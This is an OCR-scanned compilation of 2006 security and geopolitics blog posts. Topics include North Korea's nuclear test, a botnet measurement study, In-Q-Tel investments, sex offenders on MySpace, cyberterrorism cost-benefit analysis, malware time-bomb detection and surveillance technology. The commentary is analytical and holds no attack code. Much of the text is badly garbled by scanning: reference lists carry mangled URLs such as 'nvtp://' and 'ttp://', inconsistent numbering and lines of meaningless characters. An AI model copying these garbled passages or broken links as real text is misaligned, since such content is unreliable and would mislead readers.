related to the [2]U.S. Military Satellite Communication Systems : 


"Satellite communication has been a vital part of the United States military throughout 
the space age, beginning in 1946, when the Army achieved radar contact with the moon. In 
1954, the Navy began communications experiments using the moon as a reflector, and by 
1959, it had established an operational communication link between Hawaii and Washington, 
D.C. As the U.S. space program grew in the 1960s, the Department of Defense (DOD) began 
developing satellite communication systems that would address the special requirements 
of military operations. In addition to protection against jamming, these needs included the 
flexibility to rapidly extend service to new regions of the globe and to reallocate system 
capacity as needed." 


And here’s what [3]the future - NCW all the way - has to offer : 


"Military satellite communications (or milsatcom) systems are typically categorized as 
wideband, protected, or narrowband. Wideband systems emphasize high capacity. Protected 
systems stress antijam features, covertness, and nuclear survivability. Narrowband systems 
emphasize support to users who need voice or low-data-rate communications and who also 
may be mobile or otherwise disadvantaged (because of limited terminal capability, antenna 
size, environment, etc.)." 


Communications and PSYOPS win wars, information overload though, doesn’t. 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/dorip03.0.png 
2. http: //www.aero.org/publications/crosslink/winter2002/01.htm 
3. http: //www.aero.org/publications/crosslink/winter2002/08.htm 


2.10.10 North Korea’s Nuclear Testing Roundup (2006-10-12 17:53) 


[1] * Way too much is happening right now, so here’s are some of the articles, imagery and 
comments that made me an impression recently. Go through [2]previous [3]coverage on 
[4]various [5]North Korean [6]developments in case you’re interested. 


Anyway, [7]Who needs nuclear weapons anymore?! 


Wikipedia 
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[8]2006 North Korean nuclear test - full coverage, Wikipedia style 


North Korea 

[9]Anti U.S Propaganda - 2004 

[10]U.S. commits over 170 aerial espionage in May: DPRK 

[11]U.S. Commits Over 180 Cases of Aerial Espionage against DPRK 

[12]U.S. Imperialists Commit Aerial Espionage Against North Korea 

[13]N Korea in ’US spy plane’ warning 

[14]North Korea’s grislyarms tests on babies 

[15]North Korea Condemns Japan for Militarization, Blames U.S. for Breakdown in Nuclear Talks 
[16]Photos from Yongbyon nuclear site 

[17]North Korea and Nuclear Weapons: The Declassified U.S. Record 


Google Maps Imagery 
[18]North Korea Nuclear Test Site Eyeball 


Commercial Satellite Imagery 

[19]The Nodong launch facility 

[20]Possible Nuclear Test SiteP’unggye-yok, (Kilju / Kilchu / Kisshu / Gilju) 
[21]Taepodong Missile Complex, North Korea - very good resolution! 


Recent Developments Coverage 

[22]Nork Nuclear Test : It’s a Dud (UPDATED) 

[23]U.S "Dragnet" Hunts for Nuke Clues 

[24]Korea Nuke: A ‘Fizzle’? 

[25]North Korea eases the heat on Iran - for now 

[26]lran does not criticize North Korea’s nuclear test, blames Washington 
[27]KGB had regularly told Russia on Pak-China-N-Korea nuke ties 
[28]Pentagon Assesses Responses, Including a Possible Blockade 
[29]U.S. opposed to raising S. Korea’s surveillance alert: defense minister 
[30]Diverted Attention, Neglect Set the Stage for Kim’s Move 
[31]Analysis: Should U.S. talk to N. Korea? 


(Wrong) Speculations 

[32]CIA: North Korea Could Make 50 Nuclear Bombs a Year - 2002 
[33]CIA says North Korea missile can reach U.S. - 2003 

[34]North Korea’s Nuclear Weapons: How Soon an Arsenal? 


Interactives 

[35]North Korea Missile Range 

[36]North Korea nuclear test picture gallery 
[37]North Korea Nuclear Test photos 


Russia 
[38]North Korea joins the nuclear club? 
[39]Radiation in Russia normal after N. Korean nuclear test - agency 


China 
[40]China opposes millitary action against N. Korea 
[41]U.S. Congressman thanks China for informing U.S. of DPRK nuclear test 
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U.S 

[42]US missile defense said ready for N.Korea threat 

[43]Responding to North Korea 

[44]USA set to blockade North Korea and create defense complexes in space 
[45]North Korean test ‘went wrong,’ U.S. official says 


In-depth Analysis 
[46]North Korea Conducts Nuclear Test 


. http: //photos1. blogger. com/blogger2/4099/2257/1600/north_korea. jpg 
. http: //ddanchev. blogspot .com/2006/06/north-korea-turn-on-lights-please.htm 


ttp://ddanchev. blogspot .com/2006/07/north-koreas-cyber-warfare-unit-121.htm 


http: //ddanchev. blogspot .com/2006/07/japans-reliance-on-us-spy-satellites.htm 


co Janta saat coa Se] open tense neces ae cea tad 
2 e/a ere Te ae ea eT eT 
_hvtp://adanchey. blogspot. con/2006/02/sho~needs~miclear~veaponsanyuore.htal 
ttp://en.wikipedia.org/wiki/2006_North_Korean_nuclear_test 

_hvtp://ws kena, co.jp/sten/2004/200407/nevs07/26. nt 

10, nexp: //enghin.peopte con. cn/200606/S /eng2006051_ 270088. 

11. notp://eevtkorearnp.co.jp/pk/282th_issue/2006081404. na 


http: //www.anti-imperialist.org/kcna-aerial-esp_9-1-03.htm 


http://news.bbc.co.uk/2/hi/asia-pacific/5068662. stm 
http: //www.worldnetdaily.com/news/article.asp?ARTICLE_ID=50382 


http: //cryptome.org/dprk-test.htm 


http: //www.fas.org/nuke/guide/dprk/facility/nodong. ht 


http: //www.globalsecurity.org/wmd/world/dprk/kilju-punggye-yok. ht 


http: //www.isis-online.org/publications/dprk/photoindex.htm 
http: //www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB87 / 


24, jeep: //www.defensetech.org/archives/002634. hem 


. http: //www.iht.com/articles/ap/2006/10/10/africa/ME_GEN_Iran_North_Korea.php 


http: //www.foxnews.com/story/0, 2933, 215863, 00.htm 


. http: //www.zeenews.com/znnew/articles.asp?aid=328438&sid=WOR 


. http://www .nytimes.com/2006/10/10/world/asia/10military.html?_r=1k%0ref=slogi 


. bttp://english.hani.co.kr/arti/english_edition/e_international/163073.htm 
ttp://www.latimes.com/news/printedition/asection/la-fg-wrong10oct10, 1, 3420849. story?coll=la-news-a_sec 


lu=X30DMTB jMHVqMTQ4BHN1 YwNSbnN 1 YmNhdA- - 
32. http: //www.newsmax.com/archives/articles/2002/11/21/183623. shtm 
33. http://www.ctv.ca/servlet/ArticleNews/story/CTVNews/1045074558238_42/?hub=CTVNewsAt11 


4. http://www.fas.org/spp/starwars/crs/RS21391.pdf 


WwW 


. http: //www.cnn.com/interactive/world/0610/explainer .nkorea.missile/frameset .exclude.html?eref=yahoo 


36. http://www.ft.com/cms/s/0584c88c-5846- 11db-b70f -0000779e2340. htm 
37. http://en.rian.ru/photolents/20061009/54648750 .htm 
. http: //en.rian.ru/analysis/20061010/54685965 .htm 
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29, 
40. 

41. 

42. http: //today.reuters.com/news/articleinvesting. aspx?view=CN&st ory ID=2006- 10-09T203401Z_01_N09283080_RTRID 
43. 

44. http://english.pravda.ru/world/asia/10- 10-2006/84970-Korea_explosion- 

45. 

46 


2.10.11 The Return on Investment of Blogging (2006-10-12 19:17) 


ttack blog hooe = = dushess 


acks ShID “CHING chinese 


— a ev aanchto data 


Gefanse « 
future. 


fres Tut Gacd fa oa 
sete marke Biles 
People == r 


/ Warlaré 
What’s the return on investment (ROI) of blogging? [2]Blogging 
for dollars is happening already, whereas this [3]great post by Charlene Li emphasises on many 
more qualitative benefits and ways of measuring their progress, or slowed down performance : 


[1] Mind Streams of Information Security Knowledge 


"My colleague, Chloe Stromberg, and | have been interviewing companies about how 
they measure ROI and realized that we needed to throw the net wider - this is where you come 
in! The working idea is to create a framework for measuring the ROI of external blogging 
efforts for medium- and large-sized companies. Below is an outline of ingredients for the 
framework. Please help us by fleshing out sources, providing examples, and adding/editing 
our ROI factors - feel free to add comments to this post or to [4]email us directly(if you’d pre- 
fer, we'll keep specific numbers and examples confidential and use them only as background)." 


What’s my initial investment? It’s time, and time doesn’t really mean money, it means 
opportunities. 


My ROI factors : 

- visitors’ retention 

- blog stickiness 

- average time spent 

- echo-effect 

- improved networking, communication with colleagues, friends, and of course, ordes of 
hypocrites 

- successfully reaching, retaining, and informing predefined audiences 

- differentiated content channel, barely links posting only 

- third-party syndication 

- self-preservation and self-awakening 

- setting the foundation for my [5]successful identity upload and immortality into cyberspace? 


Cloud courtesy of the main blog index and density of the keywords. 


1. http://photos1.blogger.com/blogger2/4099/2257/1600/MindStreams. jpg 
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2. http: //money.cnn.com/magazines/business2/business2_archive/2006/09/01/8384325/ 
3. http://blogs.forrester.com/charleneli/2006/10/calculating_the.htm 


4. mailto:cli@forrester.com, 420cstromberg@forrester.com?subject=ROI/,200f,20blogging 


5. http://www. blogcharm. com/Singularity/25603/Timetable.htm 


2.10.12 Hunting the Hacker - Documentary (2006-10-14 20:14) 


OXOTA 


KAWEPA 


[1] Here’s a recently released documentary - in Russian - entitled 
"Oxota Ha Xxakepa", or Hunting the Hacker, discussing IT security, cyber crime, malware 
authors, onlie scams etc. It also features [2]Eugene Kaspersky commenting on various trends. 
Don’t forget, Russian hackers and Eastern European ones are not just responsible for the 
sky-rocketing cyber-crime cost "projections", but for the global warming effect as well. | often 
come across biased comments on wrongly structured research questions such as: "Who are 
the best hackers in respect to nationalities?", where it should have been formulated as "How 
vibrant is the IT security landscape, so that the changing dominance lifecycle of a nation could 
be measured at a particular moment in time?" 


True hackers don’t have nationalities, they’re citizens of the world. [3]Download [4]or 
stream it from [5]Google Video. 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/hunting_hacker . jpg 

2. http: //img152.imagevenue.com/img.php?image=19041_vlcsnap_207383_122_5891lo. jpg 
3. http: //rapidshare. de/files/35918619/Oxota_na_xakra.part1.rar 

4, nvtp://rapidshare.de/#iles/36519630/Ocota_na_xakra. part2.rar 

5. http: //video. google. com/videoplay?docid=7952991 163803057724 


2.10.13 North Korea’s Wake-up Call (2006-10-15 00:26) 


[1] * "Hey Dick, do you know what time it is? [2]It’s Time to Bomb Kim Jong!" 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/wakeup_call. jpg 
2. http://www. youtube. com/watch?v=csnyiZx0Ho8 


2.10.14 Observing and Analyzing Botnets (2006-10-16 01:15) 


[1] * Informative and rich on visual materials, research presenting a "[2]A Multifaceted 
Approach to Understanding the Botnet Phenomenon" 


"Throughout a period of more than three months, we used this infrastructure to track 
192 unique IRC botnets of size ranging from a few hundred to several thousand in- 
fected end-hosts. Our results show that botnets represent a major contributor to unwanted 
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Internet traffic—27 % of all malicious connection attempts observed from our distributed 
darknet can be directly attributed to botnetrelated spreading activity. Furthermore, we 
discovered evidence of botnet infections in 11 % of the 800,000 DNS domains we 
examined, indicating a high diversity among botnet victims. Taken as a whole, these results 
not only highlight the prominence of botnets, but also provide deep insights that may facilitate 
further research to curtail this phenomenon." 


Botnets’ security implications are often taken as a phenomenon, whereas this is not the 
case as distributed computing concepts have been around for decades. Some interesting 
graphs and observations in this research are : 


- Breakdown of scan-related commands seen on tracked botnets during the measurement 
period 

- The percentage of bots that launched the respective services (AV/FW Killer) on the victim 
machines 

- Distribution of exploited hosts extracted from the IRC tracker logs 


What botnet masters will definitely optimise : 

- disinformation for number and geolocation of infected hosts 

- alternative and covert communication channels compared to stripped, or encrypted IRC 
sessions 

- rethink of concept of performance vs stealthiness 

- rethinking how to retain the infected nodes, compared to putting more efforts into infecting 
new ones 

- for true competitiveness, vulnerabilities in anti-virus solutions allowing the code to remain 
undetected for as long as possible 

- synchronization with results from popular test beds such as [3]VirusTotal for immediate 
reintroduction of an undetected payload 


[4]The future of malware stands for solid ecosystem and [5]diversity, whereas, both, 
researchers, [6]the Pentagon, and malware authors are actively [7]benchmarking and optimis- 
ing malware, each having seperate objectives to achieve. 


Go through a previous post "[8]Malware Bot Families, Technology and Trends" in case 
you want to find out more about botnet technologies, and update yourself with the most 
[9]recent case of DDoS extortion. 


. http://photos1. blogger .com/blogger2/4099/2257/1600/Malicious_Pacman. jpg 
. http://www.cs. jhu.edu/~terzis/imc114f-aburajab.pd 


. http: //www.virustotal.com/ 


Eh 


. http://www. linuxsecurity.com/docs/malware-trends.pd 
. http: //ddanchev.blogspot .com/2006/09/malware-on-diebold-voting-machines.htm 
. bttp://www.au.af.mil/au/awc/awcgate/afrl/cybercraft.pd 

. http://ddanchev. blogspot . com/2006/09/benchmarking-and- optimising-malware .htm 


. http: //ddanchev. blogspot. com/2006/08/malware-bot-families-technology-and.htm 


. http://www.cio.com/blog_view.htm1?CID=25524 


OMAN AU KFWN FE 


Eh 


633 


2.10.15 CIA’s In-Q-Tel Investments Portfolio (2006-10-16 01:50) 


Ing FTe 


lant Salt ware 


[1] “- In a previous post "[2]Aha, a Backdoor!" | discussed the "exemp- 
tion" of publicly traded companies from reporting to the SEC the usual way, and particularly 
their investments related to national security. The strategy is visionary enough to act a major 
incentive factor for companies to both, [3]innovate, and supply the [4]homeland security and 
defense markets. 


However, [5]publicly obtainable data can still reveal historical developments: 


"A relatively unknown branch of the CIA is investing millions of taxpayer dollars in technology 
startups that, together, paint a map for the future of spying. Some of these technologies can 
pry into the personal lives of Americans not just for the government but for big businesses as 
well. 


The CIA’s venture capitalist arm, In-Q-Tel, has invested at least $185 million in startups 
since 1999, molding these companies’ products into technologies the intelligence community 
can use. 


More than 60 percent of In-Q-Tel’s current investments are in companies that specialize 
in automatically collecting, sifting through and understanding oceans of information, accord- 
ing to an analysis by the Medill School of Journalism. While In-Q-Tel has successfully helped 
push data analysis technology ahead, implementing it within the government for national 
security remains a challenge, and one of In-Q-Tel’s former CEOs, Gilman Louie, has concerns 
about whether privacy and civil liberties will be protected." 


In a related Red Herring [6]Jarticle, In-Q-Tel points out that : 
“We don’t just invest in equity of companies,” said Scott Yancey, the firm’s interim chief 
executive. “That’s kind of the hallmark of who we are in terms of being the strategic investor.” 


Observers said the payments don’t fit with the typical venture model. 


“To the extent that In-Q-Tel incentivizes its portfolio companies or employees otherwise, 
it sounds like from an outsider’s point of view that they’ve needed to create some artificial 
incentives that wouldn’t otherwise be necessary in a traditional venture model,” said Scott 
Joachim, a partner with the law firm Drinker, Biddle, & Reath." 


The Intelligence Community realizes that innovation will come from [7]outsiders working 


for insiders, and with "more than 130 technology solutions to the intelligence community", 
CIA’s In-Q-Tel seems to have made quite some [8]sound investments. 
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A true angel investor in the "silent war". And yes, even you can [9]submit a business 
plan looking for seed capital - and a "tail" to ensure you’re developing in the right direction? 


ttp://photos1. blogger .com/blogger2/4099/2257/1600/in-q-tel-portfolio. jpg 


. http: //ddanchev.blogspot .com/2006/05/aha-backdoor .htm 


ttp://news.moneycentral.msn.com/provider/providerarticle.asp?feed=AP&Date=20061005&1D=608117 


. http://www. signonsandiego.com/news/business/20060910-9999- 1b10defense .htm 


ttp://newsinitiative.org/story/2006/09/01/the_future_of_spying 


ttp://www.redherring.com/Article.aspx?a=18351&hed=CIA+VC/,E2/80/,99s+Big+Spending 


. http://f11.findlaw.com/news.findlaw.com/hdocs/docs/ingtel/inqte180701rpt. pdf 
. http: //www.in-gq-tel.com/invest/index.htm 
. http: //www.in-q-tel.com/submit/index.htm 


2.10.16 Registered Sex Offenders on MySpace (2006-10-17 00:00) 


[1] * Should you be [2]filtering online predators, prosecuting them, or monitoring their 
activities to analyze and model the behaviour of the rest of them? Seems like [3]Kevin 
Poulsen’s been data mining MySpace using the [4]Department of Justice’s National Sex 
Offender Register, and the results are a [5]Caught by Code MySpace Predator : 


"The automated script searched MySpace’s 1 million-plus profiles for registered sex offenders 
- and soon found one that was back on the prowl for seriously underage boys.Excluding 
a handful of obvious fakes, | confirmed 744 sex offenders with MySpace profiles, after an 
examination of about a third of the data. Of those, 497 are registered for sex crimes against 
children. In this group, six of them are listed as repeat offenders, though Lubrano’s previous 
convictions were not in the registry, so this number may be low. At least 243 of the 497 have 
convictions in 2000 or later." 


[6] ™ These findings indicate the offenders’ confidence in MySpace's inability to take 
the simplest measure - match the publicly accessible data with its database - just in case. 
It’s also worth mentioning that according to a recently released [7]comScore analysis "more 
than half of MySpace visitors are now age 35 or older", and that according to their analysis, 
[8]Facebook, and [9]Xanga have much younger audiences, namely represent a top target for 
online predators. 


The most important issues however, remain the moment when a kid losses the commu- 
nication with its "folks", and the huge amount of information kids share on any social 
networking site, thus unconsciously creating more contact points for the online predator. 


[10]Internet Safety for Kids - a presentation for adults, is full with handy tips for educat- 
ing and building awareness on the problem. 


_jvap://photost. blogger con/b1ogger2/4088/2267/1600asotendors3_# jp 
. http: //ddanchev. blogspot .com/2006/10/filtering-good-girls-and-im-threats.html 
ep: / tog. wired. con/ZTootroned 

ep: / ave nsepr gov) 

[eps / fave wired. con/aeve/tadumnlogy/ THRE a 


ttp://photos1. blogger . com/blogger2/4099/2257/1600/social_network_demographics. jpg 
ttp://www.comscore.com/press/release.asp?press=1019 
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8. http: //www.facebook.com/ 
9. http: //www.xanga.com/ 
10. http: //www.packet-level.com/kids/handouts/iskhandout-20060111.pdf 


2.10.17 The Stereotyped Beauty Model (2006-10-18 20:39) 


[1] * If women/girls didn’t hate each other so much, they could rule the world. [2]Nice ad 
counter-attacking the entire "chickness ad model". Feels like Unilever got so successful pro- 
moting it, so that now they have to reposition themselves as a socially oriented company, not 
masters of Photoshop whose virtual creations [3]directly influence McDonald’s business model. 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/getting_hot.jpg 
2. http://youtube .com/watch?v=knEIM16NuPg 


3. http: //www.dailymail.co.uk/pages/live/femail/article.html?in_article_id=406198%in_page_id=1879 


2.10.18 A Cost-Benefit Analysis of Cyber Terrorism (2006-10-18 21:01) 


[1] * What would the ROI be for a [2]terrorist organization wanting to take advantage of 
[3]cyberterrorism, and how would they measure it? 


Provocative perspective trying to emphasize on the minimal resources required to de- 
velop a cyberterrorism platform, with very interesting assessments of various financial issues 
and possible casualties. "[4]A Cost-Benefit Analysis of Cyber Terrorism" tries to answer: 


"Would cyberterrorism be a viable option for terrorists? This article addresses these 
questions assuming that a hypothetical terrorist group, interested in adding cyberterrorism to 
its arsenal, de-cides to engage in a cost-benefit analysis to assess the payoffs and investment 
re-quired by such a new endeavor. The conclusions are that cyberterrorism is not a 
very efficient substitute for more traditional tools like bombs. It is more effective 
for the terrorists to exploit information infrastructures to fight a “war of ideas,” 
spreading their beliefs and points of view." 


While the publication is released two years ago, it has recently come to the global atten- 
tion that [5]Hezbollah aren’t exactly the type of cave-hiding individuals, ones fully realizing 
the concept of outsourcing instead of re-inventing the wheel. While attacks on the [6]critical 
infrastructure, namely frontal cyberterrorism attacks are still priority number one, and the 
[7]possible scenarios already tested numerous times, this "cyberterrorism myopia" created 
many other dimensions of the concept. 


What went beneath the radar and consequently evolved? 

- online [8]radicalization, [9]propaganda, [10]communication, recruitment, education, and 
fund-raising actually produce the "traditional terrorists" 

- PSYOPS twisting the very foundations of the religion for the sake of a cause 

- religious extremism started targeting more easily influenced/brainwashed youngsters while 
CCTVs were installed on the hot spots, and new IDs when homegrown terrorists make the 
news 

- [11]Hezbollah using U.S hosting companies since 1998 

- [L2JOSINT backed [13]PSYOPS improving the truthfulness of the statements 
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[14]Keep on reading and [15]data mining. 


. http://photos1. blogger .com/blogger2/4099/2257/1600/cbmatrix.gif 
. http: //del.icio.us/DDanchev/Terroris 
. http: //del.icio.us/DDanchev/Cyberterrorism 


ttps://www.webdepot .umontreal .ca/Usagers/langlost/MonDepotPublic/tic/cyber/20terror/20cost- benefit. pdf 


. http: //www.atimes.com/atimes/Middle_Fast/HIO9Ak01.htm 


ttp://ddanchev. blogspot. com/2006/10/scada-security-incidents-and-critical.htm 


ttp://ddanchev. blogspot .com/2006/09/results-of-cyber-storm-exercise.htm 


. http: //ddanchev.blogspot .com/2006/06/tracking-down-internet-terrorist .html 


ttp://www.haganah.org.il/haganah/index.htm 
10. http://ddanchev. blogspot .com/2006/08/cyber-terrorism-communications-and_22.htm 


. http://www. haganah.org.il/harchives/005680.htm 
12. http://ddanchev. blogspot .com/2006/09/benef its-of-open-source-intelligence.htm 


ttp://ddanchev. blogspot .com/2006/09/internet-psyops-psychological .htm 


14, 


ttp://tajdeed-list .net/pipermail/pir_tajdeed-list .net/2006- June/000092.htm 


2.10.19 Detecting Malware Time Bombs with Virtual Machines (2006-10-24 12:42) 


T 
it 


[1] Stand Alone Virtual Machine Back in June, details on an event that happened [2]during 2002 
started emerging, namely [3]UBS bank’s employee use of a [4]logic bomb on the internal 
network that naturally had the type of insider empowerment it needed to spread : 


"According to prosecutors, shortly after Duronio created the code in late 2001, he quit 
his job and banked thousands in "put" options against UBS, in which he would profit if the 
company’s stock price declined by March 15, 2002, as a result of the attack he had allegedly 
set to launch against computer systems on March 4. Prosecutors said that "within an hour or 
so" of walking out the door from UBS, Duronio was at a securities office buying "puts" against 
UBS. The mail fraud charges relate to confirmation of purchases of the puts that were sent 
through the U.S. Postal Service. The damage caused by the malicious code impaired trading 
at the firm that day, hampering more than 1,000 servers and 17,000 individual work stations. 
The attack cost UBS about $3 million to assess and repair, said Assistant U.S. Attorney V. 
Grady O’Malley. "It took hundreds of people, thousands of man hours and millions of dollars 
to correct," O’Malley told jurors." 


And while this isn’t the last time logic bombs are used - [5]Jexamples during the 80’s - 
it’s important to note how flexible that type of malware could be, going way beyond the most 
common trigger - a [6]specific date and time. 


The authors of "[7]Detecting Malware Timebombs with Virtual Machines" conducted re- 
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search on automated early warning system to shorten the time necessary to estimate the 
exact timetable of a malware in question : 


"Worms, viruses, and other malware can be ticking bombs counting down to a specific 
time, when they might, for example, delete files or download new instructions from a public 
web server. We propose a novel virtual-machine-based analysis technique to automatically 
discover the timetable of a piece of malware, or when events will be triggered, so that other 
types of analysis can discern what those events are. This information can be invaluable 
for responding to rapid malware, and automating its discovery can provide more accurate 
information with less delay than careful human analysis." 


It successfully analyses Code Red, Klez, MyParty, Blaster, CME-24 and speculates on the 
future of the automated process. Worth reading and rethinking is the Internet’s infected 
population actually the zombies, or aren’t they the ones who still haven’t been awakened? 


1. http: //photos1.blogger.com/blogger2/4099/2257/1600/vm. gif 


2. http://www. informationweek.com/news/showArticle. jhtml?articleID=189601826&%subSect ion=Breaking+News 
3. http://www. infoworld. com/article/06/06/08/79069_HNcomputerbomb_1.htm 


4. http://taosecurity. blogspot .com/2006/06/real-logic-bomb-logic-bomb-is-term.htm 


5. http: //catless.ncl.ac.uk/Risks/5.63.html#subj1 


6. http: //ddanchev. blogspot .com/2006/02/cme-24-aka-nyxem-and-whos-infected.html 


7. http://wwwesif.cs.ucdavis.edu/~crandall/asplosO6temporal. pdf 


2.10.20 China’s Information Security Market (2006-10-24 12:56) 


[1] — [2]China’s information security market is very much into the 
introduction stage, with perimeter based defenses acting as the main security solutions 
purchased there : 


"Statistics shows that the size of China information security market arrived at RMB 1080 
million Yuan in Q2 2006, 21.35 % higher than the same period of last year, and 6.93 % more 
than Q1. In Q2 2006, sales revenue of firewall products was RMB 474 million Yuan, and 
anti-virus software is RMB 305 million Yuan. Figure2 demonstrates different security products 
market shares. Figure3 and Figure 4 list major vendors of firewall software and anti-virus 
software, respectively." 


It’s perhaps the perfect timing for you to find reliable channel partners and position yourself 
on the local market that’s about to attract even more government attention with the ongoing 
networking of China, thus a more foreign-business-friendly security market than it is today. 
Among the most recent, and free of course, research on the security market in China | often 
find myself coming back to is [3]Yan Liu’s thesis on the current and future market trends. From 
an investor’s or analyst’s point of view, you may also find [4]The Global State of Information 
Security in 2006 a very informative and rich on visual materials survey. 
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1. http://photos1. blogger .com/blogger2/4099/2257/1600/2006829205356big2. jpg 


2. http: //www.ccwresearch.com.cn/pubSystem/pubAdmin/switch. asp?ColumnId=1006&ArticleId=12221 


3. http://www.dsv.su.se/research/seclab/pages/pdf-files/2006-x-362. pdf 
4. http://www.cio.com/archive/091506/security_survey.htm 


2.10.21 The Surveillance System About to Get Overloaded (2006-10-24 14:19) 


[1] | wounder would they later on publicly announce "Hall of 
Fame/Shame" of the most regular drinkers, and actually use to data to fuel growth in local 
anti-drinking initiatives based on the most "affected" regions? [2]Beer fingerprints to go 
UK-wide : 


"The government is funding the roll out of fingerprint security at the doors of pubs and 
clubs in major English cities. Funding is being offered to councils that want to have their 
pubs keep a regional black list of known trouble makers. The fingerprint network installed 
in February by South Somerset District Council in Yeovil drinking holes is being used as the 
showcase." 


Use a public WC - [3]Big Brother’s peeping, have a beer - it’s on Big Brother’s bill, and 
if this isn’t a total abuse of technology and tax payer’s money to spy on them, what is? A 
system like this would be useless to local bartenders, to be honest their experience for spotting 
the drunken monkeys or knowing them would prove invaluable in this case. From another 
perspective, these trouble makers, given they don’t trash the place, are actually among the 
major consumers there. 


The article makes a good point through - if pubs and clubs get extra monitoring, do- 
mestic violance increases, so would you install CCTVs at home to prevent it through the 
"psychological effect" as well? 


1. http://photos1.blogger.com/blogger2/4099/2257/1600/heineken. jpg 
2. http://www.theregister.co.uk/2006/10/20/pub_fingerprints/ 
3. http: //ddanchev. blogspot . com/2006/06/big-brother-in-restroom.htm 


2.10.22 What are you Looking at? (2006-10-26 15:13) 


[1] * You piece of EyeBall surveillance camera! 


1. http://photos1.blogger .com/blogger2/4099/2257/1600/Shot0001 . jpg 
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2.10.23 Ms. Dewey on Microsoft and Security (2006-10-26 15:31) 


[1] She sure knows "[2]all these little ones and zeroes", and your [3]social 
security number altogether. | like the idea, reminds of the futuristic holograms of Einstein acting 
as interactive Wikipedia which when asked about WWII starts projecting battles - she’s thinking 
way too long, but as she pointed out she’s just a chick in front of your computer. 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/dewey. jpg 


ttp://www.msdewey.com/index.html?s=microsoft&r=C0-00 


[1] 4) [2]ShotSpotter is : 

"a network of noise sensors that identifies and pinpoints gunfire. Over the past few 
weeks, the technology has guided police to three homicides in Southeast Washington, and in 
one case officers got there rapidly enough to make an arrest. 


ShotSpotter complements 48 surveillance cameras installed in many city neighborhoods. 
But unlike the cameras, which are checked after the fact, ShotSpotter gets word to police as 
soon as bullets start flying - in many cases before anyone has a chance to call 911. Over 
the past two months, the sensors, roughly the size of coffee cans, have been hidden atop 
buildings in many sections of Southeast Washington." 


[3]Innovative, but how well is it performing when it comes to filtering a three cars syn- 
chronized gangsta rap music, and the not so fashionable, but adaptive use of [4]silencers? It 
makes me think on the possibility of disinformation by criminals knowing someone’s listening 
and responding to gunshots. On the other hand, it could have ever wider acceptance in a war 
zone acting as an early warning system. 


UPDATE: [5]Techdirt’s comments on the system. 


1. http: //photos1. blogger. com/blogger2/4099/2257/1600/p5864.0. jpg 
2. http: //www.shotspotter.com/ 
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3. http: //www.washingtonpost .com/wp-dyn/content /article/2006/10/21/AR2006102100826 .htm1 
4. http://en.wikipedia. org/wiki/Suppresso 
5. http://www.techdirt.com/articles/20061026/090955.shtm 


2.10.25 Real-Time Spam Outbreak Statistics (2006-10-28 20:57) 


Real-time Outbreak Monitor 


oo | 


[1] . < Following my previous posts on "[2]Real-Time PC Zombie Statis- 
tics", and "[3]Email Spam Harvesting Statistics", you may also find WatchGuard’s recently 
[4]released real-time spam outbreak statistics entertaining : 


"Once in a while as I’m getting flooded with some particularly repititious spam bomb, |! 
wonder whether other networks are receiving the same dumb stuff. And occasionally, | 
wonder where it originated from. 


Both questions are readily answered with a [5]nifty Web utilityprovided by the Comm- 
Touch Detection Center. [Full disclosure: WatchGuard’s spamBlocker product is powered 
by a license with CommtTouch.] The utility shows a map of the world, with red spots in- 
dicating the approximate location of new spam outbreaks. If you hover your cursor over 
any of the red zones, a popup box shows the subject lines of the most recently detected 
spam. It’s an easy, instant way to verify whether an email you received is part of a spampaign." 


Naturally, the stats are only limited to the vendor’s sensor network worldwide, whereas 
you still get the chance to feel the dynamics of spam outbreaks worldwide. | often speculate - 
and got the case studies proving it - that the more pressure is put on [6]spammers, [7 ]phishers 
and [8]malware authors, the higher would their consolidation become. For the time being, 
spammers are mostly utilizing the cost-effective one-to-many communication model, and 
their ROI - where the investment is in renting infected zombie PCs - is positive by default 
without them even segmenting, targeting and actually reaching the most gullible audience. If 
spammers change this model, it would mean a much faster email services worldwide, but for 
the time being, number of messages sent compared to basic marketing practices seems to be 
the benchmark. 


Spammers got the "contact points", malware authors the platform and the payload, and 
phishers the social engineering "know-how", | find spammers missing so badly these days - 
the trade off for delivering the spam through content obfuscation is the quality of the message 
itself. Trouble is, they'll soon realize that marriage is better than the divorce and unite forces 
given the pressure. 


UPDATE: "[9]Bot nets likely behind jump in spam" discusses the consolidation, or the 
possibility for services on demand. Via [10]Sunbelt’s blog. 


1. http://photos1.blogger .com/blogger2/4099/2257/1600/real_time_spam_outbreak. jpg 
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ttp://ddanchev. blogspot .com/2006/06/real-time-pc-zombie-statistics.htm 


. http: //ddanchev. blogspot .com/2006/09/email-spam-harvesting-statistics.htm 
. http: //www.watchguard.com/products/realtimemonitor.asp 
. http: //www.watchguard.com/products/realtimemonitor.asp 


ttp://ddanchev. blogspot .com/2006/06/over-performing- spammer .htm 


http: //ddanchev. blogspot .com/2006/09/google-anti-phishing-black-and-white. htm 


. http: //ddanchev. blogspot .com/2006/09/benchmarking-and-optimising-malware.htm 
. http://www. securityfocus.com/news/11420 


10. http://sunbeltblog. blogspot. com/2006/10/spam-yeah-its-up.htm 
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2.10.26 Face Recognition on 3G Cell Phones (2006-10-29 00:41) 


[1] * [2]Face recognition isn’t just done at home courtesy of MyHeritage.com, but on-the-go 
with yet another [3]release of face recognition authentication for cell phones by a leading 
mobile operator in Japan : 


"Security features include biometric authentication (user’s face) and compatibility with Do- 
CoMo’s Omakase Lock™ remote locking service, as well as the Data Security Service™ for 
backing up phonebooks and other important data on a network server. The model can func- 
tion as an e-wallet, timecard and personal identification card for accessing restricted areas." 


The concept has been around for quite some time, but with Japan representing one of the 
most [4]mature markets for mobile devices - right after South Korea - the feature would briefly 
gain popularity and acceptance. The interesting part is the [5]security vs usability issue as if 
the face recognition doesn’t provide perfect results in every environment and under external 
factors such as darkness or even brightness, by the time the technology matures, a secret 
question to further authenticate or good old PIN code would do the work. 


Here’s a [6]very well sorted library of various research on the topic, and an interesting service 
that’s [7]sharing a stolen phone’s photos. 


. http: //photos1. blogger. com/blogger2/4099/2257/1600/docomo.0. jpg 
. http: //ddanchev. blogspot .com/2006/08/face-recognition-at-home.htm 


1 
2 
3. http: //www.nttdocomo. com/pr/2006/001293. htm 

